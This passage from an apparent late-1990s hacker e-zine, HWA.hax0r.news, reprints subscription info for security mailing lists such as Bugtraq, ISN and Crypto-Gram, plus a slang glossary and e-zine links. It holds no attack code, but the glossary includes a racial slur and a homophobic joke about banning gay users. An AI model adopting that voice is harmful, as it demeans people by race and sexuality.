is assumed the mail was not sent to your pager.

This list is for informational purposes only. Subscribing denotes your
acceptance of the following:

1. we have nothing to do with the hacks. at all.
2. we are only mirroring the work of OTHER people.
3. we can not be held liable for anything related to these hacks.
4. all of the points on the disclaimer listed below.

Under no circumstances may the information on this list be used to
solicit security business. You do not have permission to forward this
mail to anyone related to the domain that was defaced.

enjoy.

List maintainer: jericho@attrition.org
Hosted by: majordomo@attrition.org

Relevant Links:
  Disclaimer: http://www.attrition.org/mirror/attrition/notes.html
  ATTRITION Mirror: http://www.attrition.org/mirror/

-=-

THE MOST READ:

BUGTRAQ - Subscription info
~~~~~~~~~~~~~~~~~~~~~~~~~~~

What is Bugtraq?

Bugtraq is a full-disclosure UNIX security mailing list (see the info
file) started by Scott Chasin. To subscribe to bugtraq, send mail to
listserv@netspace.org containing the message body subscribe bugtraq.

I've been archiving this list on the web since late 1993. It is
searchable with glimpse and archived on-the-fly with hypermail.

Searchable Hypermail Index;
http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html

About the Bugtraq mailing list
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following comes from Bugtraq's info file:

This list is for *detailed* discussion of UNIX security holes: what they
are, how to exploit, and what to do to fix them.

This list is not intended to be about cracking systems or exploiting
their vulnerabilities. It is about defining, recognizing, and preventing
use of security holes and risks.

Please refrain from posting one-line messages or messages that do not
contain any substance that can relate to this list`s charter.

I will allow certain informational posts regarding updates to security
tools, documents, etc. But I will not tolerate any unnecessary or
nonessential "noise" on this list.
Please follow the below guidelines on what kind of information should be
posted to the Bugtraq list:

+ Information on Unix related security holes/backdoors (past and present)
+ Exploit programs, scripts or detailed processes about the above
+ Patches, workarounds, fixes
+ Announcements, advisories or warnings
+ Ideas, future plans or current works dealing with Unix security
+ Information material regarding vendor contacts and procedures
+ Individual experiences in dealing with above vendors or security
  organizations
+ Incident advisories or informational reporting

Any non-essential replies should not be directed to the list but to the
originator of the message. Please do not "CC" the bugtraq reflector
address if the response does not meet the above criteria.

Remember: YOYOW. You own your own words. This means that you are
responsible for the words that you post on this list and that
reproduction of those words without your permission in any medium outside
the distribution of this list may be challenged by you, the author.

For questions or comments, please mail me:
chasin@crimelab.com (Scott Chasin)

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I am pleased to inform you of several changes that will be occurring on
June 5th. I hope you find them as exciting as I do.

BUGTRAQ moves to a new home
---------------------------

First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to
SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below.
Other than the change of domains nothing of how the list is run changes.
I am still the moderator. We play by the same rules.

Security Focus will be providing mail archives for BUGTRAQ. The archives
go back longer than Netspace's and are more complete than Geek-Girl's.

The move will occur one week from today. You will not need to
resubscribe. All your information, including subscription options, will
be moved transparently.
Any of you using mail filters (e.g. procmail) to sort incoming mail into
mail folders by examining the From address will have to update them to
include the new address. The new address will be:

BUGTRAQ@SECURITYFOCUS.COM

Security Focus will also be providing a free searchable vulnerability
database.

BUGTRAQ es muy bueno
--------------------

It has also become apparent that there is a need for forums in the spirit
of BUGTRAQ where non-English speaking people or people that don't feel
comfortable speaking English can exchange information. As such I've
decided to give BUGTRAQ in other languages a try.

BUGTRAQ will continue to be the place to submit vulnerability
information, but if you feel more comfortable using some other language
you can give the other lists a try. All relevant information from the
other lists which have not already been covered here will be translated
and forwarded on by the list moderator.

In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese)
which will be moderated by Nobuo Miwa and BUGTRAQ-SP (Spanish) which will
be moderated by CORE SDI S.A. from Argentina (the folks that brought you
Secure Syslog and the SSH insertion attack).

What is Security Focus?
-----------------------

Security Focus is an exercise in creating a community and a security
resource. We hope to be able to provide a medium where useful and
successful resources such as BUGTRAQ can occur, while at the same time
providing a comprehensive source of security information.

Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek
Girl herself!) have moved over to Security Focus to help us with building
this new community. The other staff at Security Focus are largely derived
from long time supporters of Bugtraq and the community in general. If you
are interested in viewing the staff pages, please see the 'About' section
on www.securityfocus.com.

On the community creating front you will find a set of forums and mailing
lists we hope you will find useful.
A number of them are not scheduled to start for several weeks but
starting today the following list is available:

* Incidents' Mailing List. BUGTRAQ has always been about the discussion
  of new vulnerabilities. As such I normally don't approve messages about
  break-ins, trojans, viruses, etc with the exception of wide spread
  cases (Melissa, ADM worm, etc). The other choice people are usually
  left with is to email CERT but this fails to communicate this important
  information to others that may be potentially affected. The Incidents
  mailing list is a lightly moderated mailing list to facilitate the
  quick exchange of security incident information. Topical items include
  such things as information about rootkits, new trojan horses and
  viruses, source of attacks and tell-tale signs of intrusions.

  To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of:

  SUBS INCIDENTS FirstName, LastName

Shortly we'll also be introducing an Information Warfare forum along with
ten other forums over the next two months. These forums will be built and
moderated by people in the community as well as vendors who are willing
to take part in the community building process.

*Note to the vendors here* We have several security vendors who have
agreed to run forums where they can participate in the online
communities. If you would like to take part as well, mail Alfred Huger,
ahuger@securityfocus.com.

On the information resource front you find a large database of the
following:

* Vulnerabilities. We are making accessible a free vulnerability
  database. You can search it by vendor, product and keyword. You will
  find detailed information on the vulnerability and how to fix it, as
  well as links to reference information such as email messages,
  advisories and web pages. The database itself is the result of culling
  through 5 years of BUGTRAQ plus countless other lists and news groups.
  It's a shining example of how thorough full disclosure has made a
  significant impact on the industry over the last half decade.

* Products. An incredible number of categorized security products from
  over two hundred different vendors.

* Services. A large and focused directory of security services offered
  by vendors.

* Books, Papers and Articles. A vast number of categorized security
  related books, papers and articles. Available to download directly from
  our servers when possible.

* Tools. A large array of free security tools. Categorized and available
  for download.

* News: A vast number of security news articles going all the way back
  to 1995.

* Security Resources: A directory to other security resources on the net.

As well as many other things such as an event calendar. For your
convenience the home-page can be personalized to display only information
you may be interested in. You can filter by categories, keywords and
operating systems, as well as configure how much data to display.

I'd like to thank the fine folks at NETSPACE for hosting the site for as
long as they have. Their services have been invaluable.

I hope you find these changes for the best and the new services useful.
I invite you to visit http://www.securityfocus.com/ and check it out for
yourself. If you have any comments or suggestions please feel free to
contact me at this address or at aleph1@securityfocus.com.

Cheers.

--
Aleph One / aleph1@underground.org
http://underground.org/
KeyID 1024/948FD6B5
Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01

Crypto-Gram
~~~~~~~~~~~

CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses,
insights, and commentaries on cryptography and computer security.

To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a
blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe,
visit http://www.counterpane.com/unsubform.html. Back issues are
available on http://www.counterpane.com.
CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of
Counterpane Systems, the author of "Applied Cryptography," and an
inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on
the board of the International Association for Cryptologic Research,
EPIC, and VTW. He is a frequent writer and lecturer on cryptography.

CUD Computer Underground Digest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This info directly from their latest ish:

Computer underground Digest    Sun  14 Feb, 1999   Volume 11 : Issue 09
                               ISSN  1004-042X

       Editor: Jim Thomas (cudigest@sun.soci.niu.edu)
       News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu)
       Archivist: Brendan Kehoe
       Poof Reader:   Etaion Shrdlu, Jr.
       Shadow-Archivists: Dan Carosone / Paul Southworth
                          Ralph Sims / Jyrki Kuoppala
                          Ian Dickinson
       Cu Digest Homepage: http://www.soci.niu.edu/~cudigest

[ISN] Security list
~~~~~~~~~~~~~~~~~~~

This is a low volume list with lots of informative articles, if I had my
way i'd reproduce them ALL here, well almost all .... ;-) - Ed

UPDATED Sept/99 - Sent in by Androthi, tnx for the update
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--[ New ISN announcement (New!!)

Sender: ISN Mailing List
From: mea culpa
Subject: Where has ISN been?
Comments: To: InfoSec News
To: ISN@SECURITYFOCUS.COM

It all starts long ago, on a network far away.. Not really.

Several months ago the system that hosted the ISN mail list was taken
offline. Before that occurred, I was not able to retrieve the subscriber
list. Because of that, the list has been down for a while. I opted to
wait to get the list back rather than attempt to make everyone
resubscribe.

As you can see from the headers, ISN is now generously being hosted by
Security Focus [www.securityfocus.com]. They are providing the bandwidth,
machine, and listserv that runs the list now.
Hopefully, this message will find all ISN subscribers, help us weed out
dead addresses, and assure you the list is still here. If you have found
the list to be valuable in the past, please tell friends and associates
about the list.

To subscribe, mail listserv@securityfocus.com with "subscribe isn
firstname lastname". To unsubscribe, "unsubscribe isn".

As usual, comments and suggestions are welcome. I apologize for the down
time of the list. Hopefully it won't happen again. ;)

mea_culpa
www.attrition.org

--[ Old ISN welcome message

[Last updated on: Mon Nov 04 0:11:23 1998]

InfoSec News is a privately run, medium traffic list that caters to
distribution of information security news articles. These articles will
come from newspapers, magazines, online resources, and more.

The subject line will always contain the title of the article, so that
you may quickly and efficiently filter past the articles of no interest.

This list will contain:

o Articles catering to security, hacking, firewalls, new security
  encryption, products, public hacks, hoaxes, legislation affecting
  these topics and more.
o Information on where to obtain articles in current magazines.
o Security Book reviews and information.
o Security conference/seminar information.
o New security product information.
o And anything else that comes to mind..

Feedback is encouraged. The list maintainers would like to hear what you
think of the list, what could use improving, and which parts are "right
on". Subscribers are also encouraged to submit articles or URLs. If you
submit an article, please send either the URL or the article in ASCII
text. Further, subscribers are encouraged to give feedback on articles
or stories, which may be posted to the list.
Please do NOT:

* subscribe vanity mail forwards to this list
* subscribe from 'free' mail addresses (ie: juno, hotmail)
* enable vacation messages while subscribed to mail lists
* subscribe from any account with a small quota

All of these generate messages to the list owner and make tracking down
dead accounts very difficult. I am currently receiving as many as fifty
returned mails a day. Any of the above are grounds for being
unsubscribed. You are welcome to resubscribe when you address the
issue(s).

Special thanks to the following for continued contribution:
William Knowles, Aleph One, Will Spencer, Jay Dyson, Nicholas Brawn,
Felix von Leitner, Phreak Moi and other contributors.

ISN Archive: ftp://ftp.repsec.com/pub/text/digests/isn
ISN Archive: http://www.landfield.com/isn
ISN Archive: http://www.jammed.com/Lists/ISN/

ISN is Moderated by 'mea_culpa'. ISN is a private list. Moderation of
topics, member subscription, and everything else about the list is solely
at his discretion.

The ISN membership list is NOT available for sale or disclosure.

ISN is a non-profit list. Sponsors are only donating to cover bandwidth
and server costs.

Win2k Security Advice Mailing List (new added Nov 30th 1999)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To subscribe: send "SUBSCRIBE WIN2KSECADVICE anonymous or name" in the
message body to listserv@listserv.ntsecurity.net

Welcome to Win2K Security Advice! Thank you for subscribing. If you have
any questions or comments about the list please feel free to contact the
list moderator, Steve Manzuik, at steve@win2ksecadvice.net.

To see what you've missed recently on the list, or to research an item
of interest, be sure to visit the Web-based archives located at:
http://www.ntsecurity.net/scripts/page_listserv.asp?s=win2ksec

==============

NTSecurity.net brings the security community a brand new (Oct 99) and
much-requested Windows security mailing list.
This new moderated mailing list, Win2KSecAdvice (formerly NTSecAdvice,)
is geared towards promoting the open discussion of Windows-related
security issues. With a firm and unwavering commitment towards timely
full disclosure, this new resource promises to become a great forum for
open discussion regarding security-related bugs, vulnerabilities,
potential exploits, viruses, worms, Trojans, and more.

Win2KSecAdvice promotes a strong sense of community and we openly invite
all security minded individuals, be they white hat, gray hat, or black
hat, to join the new mailing list. While Win2KSecAdvice was named in the
spirit of Microsoft's impending product line name change, and meant to
reflect the list's security focus both now and in the long run, it is by
no means limited to security topics centered around Windows 2000. Any
security issues that pertain to Windows-based networking are relevant for
discussion, including all Windows operating systems, MS Office, MS
BackOffice, and all related third party applications and hardware. The
scope of Win2KSecAdvice can be summarized very simply: if it's relevant
to a security risk, it's relevant to the list.

The list archives are available on the Web at http://www.ntsecurity.net,
which include a List Charter and FAQ, as well as Web-based searchable
list archives for your research endeavors.

SAVE THIS INFO FOR YOUR REFERENCE:

To post to the list simply send your email to
win2ksecadvice@listserv.ntsecurity.net

To unsubscribe from this list, send UNSUBSCRIBE WIN2KSECADVICE to
listserv@listserv.ntsecurity.net

Regards,

Steve Manzuik, List Moderator
Win2K Security Advice
steve@win2ksecadvice.net

@HWA

A.9 Whats in a name? why HWA.hax0r.news??
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Well what does HWA stand for? never mind, if you ever find out I may have
to get those hax0rs from 'Hackers' or the Pretorians after you.
In case you couldn't figure it out, hax0r is "new skewl" and although it
is laughed at, shunned, or even pigeon holed with those 'dumb leet (l33t?)
dewds' this is the state of affairs. It ain't Steven Levy's HACKERS
anymore. BTW to all you up and comers, i'd highly recommend you get that
book. Its almost like buying a clue.

Anyway..on with the show ..

- Editorial staff

@HWA

A.10 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again)
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Also released in issue #3. (revised) check that issue for the faq, it
won't be reprinted unless changed in a big way, with the exception of the
following excerpt from the FAQ, included to assist first time readers:

Some of the stuff related to personal usage and use in this zine are
listed below: Some are very useful, others attempt to deny any possible
attempts at eschewing obfuscation by obscuring their actual definitions.

@HWA    - see EoA ;-)

!=      - Mathematical notation "is not equal to" or "does not equal"
          ASC(247) "wavey equals" sign means "almost equal" to. If
          written as =/= (equals sign with a slash thru it) also means
          !=, =< is Equal to or less than and => is equal to or greater
          than (etc, this aint fucking grade school, cripes, don't
          believe I just typed all that..)

AAM     - Ask a minor (someone under age of adulthood, usually <16, <18
          or <21)

AOL     - A great deal of people that got ripped off for net access by a
          huge clueless isp with sekurity that you can drive buses
          through, we're not talking Kung-Fu being none too good here,
          Buy-A-Kloo maybe at the least they could try leasing one??
*CC     - 1 - Credit Card (as in phraud)
          2 - .cc is COCOS (Keeling) ISLANDS but they probably accept
              cc's

CCC     - Chaos Computer Club (Germany)

*CON    - Conference, a place hackers crackers and hax0rs among others go
          to swap ideas, get drunk, swap new mad inphoz, get drunk, swap
          gear, get drunk, watch videos and seminars, get drunk, listen
          to speakers, and last but not least, get drunk.

*CRACKER - 1. Someone who cracks games, encryption or codes, in popular
              hacker speak he's the guy that breaks into systems and is
              often (but by no means always) a "script kiddie" see pheer
           2. An edible biscuit usually crappy tasting without a nice
              dip, I like jalapeno pepper dip or chives sour cream and
              onion, yum - Ed

Ebonics - speaking like a rastafarian or hip dude of colour also wigger
          Vanilla Ice is a wigger, The Beastie Boys and rappers speak
          using ebonics, speaking in a dark tongue ... being ereet, see
          pheer

EoC     - End of Commentary
EoA     - End of Article or more commonly @HWA
EoF     - End of file
EoD     - End of diatribe (AOL'ers: look it up)

FUD     - Coined by Unknown and made famous by HNN - "Fear uncertainty
          and doubt", usually in general media articles not high brow
          articles such as ours or other HNN affiliates ;)

du0d    - a small furry animal that scurries over keyboards causing
          people to type weird crap on irc, hence when someone says
          something stupid or off topic 'du0d wtf are you talkin about'
          may be used.

*HACKER - Read Steven Levy's HACKERS for the true definition, then see
          HAX0R

*HAX0R  - 1 - Cracker, hacker wannabe, in some cases a true hacker, this
              is difficult to define, I think it is best defined as pop
              culture's view on The Hacker ala movies such as well erhm
              "Hackers" and The Net etc... usually used by "real" hackers
              or crackers in a derogatory or slang humorous way, like
              'hax0r me some coffee?' or 'can you hax0r some bread on
              the way to the table please?'
          2 - A tool for cutting sheet metal.
HHN      - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;&

HNN      - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html

J00      - "you" (as in j00 are OWN3D du0d) - see 0wn3d

MFI/MOI  - Missing on/from IRC

NFC      - Depends on context: No Further Comment or No Fucking Comment

NFR      - Network Flight Recorder (Do a websearch) see 0wn3d

NFW      - No fuckin' way

*0WN3D   - You are cracked and owned by an elite entity, see pheer

*OFCS    - Oh for christ's sakes

PHACV    - And variations of same: Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups, Virus, Warfare
           Alternates:
           H  - hacking, hacktivist
           C  - Cracking
           V  - Virus
           W  - Warfare
           A  - Anarchy (explosives etc, Jolly Roger's Cookbook etc)
           P  - Phreaking, "telephone hacking" PHone fREAKs ...
           CT - Cyber Terrorism

*PHEER   - This is what you do when an ereet or elite person is in your presence, see 0wn3d

*RTFM    - Read the fucking manual - not always applicable since some manuals are pure shit, but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass.

TBC      - To Be Continued, also 2bc (usually followed by ellipses...) :^0

TBA      - To Be Arranged/To Be Announced, also 2ba

TFS      - Tough fucking shit. Like when you're kb'd from our chans for being gay, it's TFS.

*w00t    - 1 - Reserved for the uber ereet, no one can say this without severe repercussions from the underground masses. also "w00ten"
           2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers)

*wtf     - what the fuck, where the fuck, when the fuck etc ..

*ZEN     - The state you reach when you *think* you know everything (but really don't); usually shortly after reaching the ZEN-like state something will break that you just 'fixed' or tweaked.
A.11 NEW Underground E-Zines
~~~~~~~~~~~~~~~~~~~~~~~

New releases:

SET Saqueadores Edición Técnica: http://www.set-ezine.org
f41th magazine issue 12 is out.: http://f41th.com/index2.html
Digital Defiance 5 (!) is out..: http://www.hackers.cx

New zines on the scene:

InET.......................... http://www.warpedreality.com/inet
Hack In the Box............... http://www.thelimit.net/hitb
Quadcon....................... http://landfill.bit-net.com/~quadcon/quadcon-3.txt
DataZine...................... http://www.tdcore.com
Napalm........................ http://napalm.firest0rm.org/
Digital Defiance.............. http://www.hackers.cx
b0g .......................... http://www.b0g.org

@HWA

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999, 1900 (c) Cruciphux/HWA.hax0r.news (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
2000 (k)
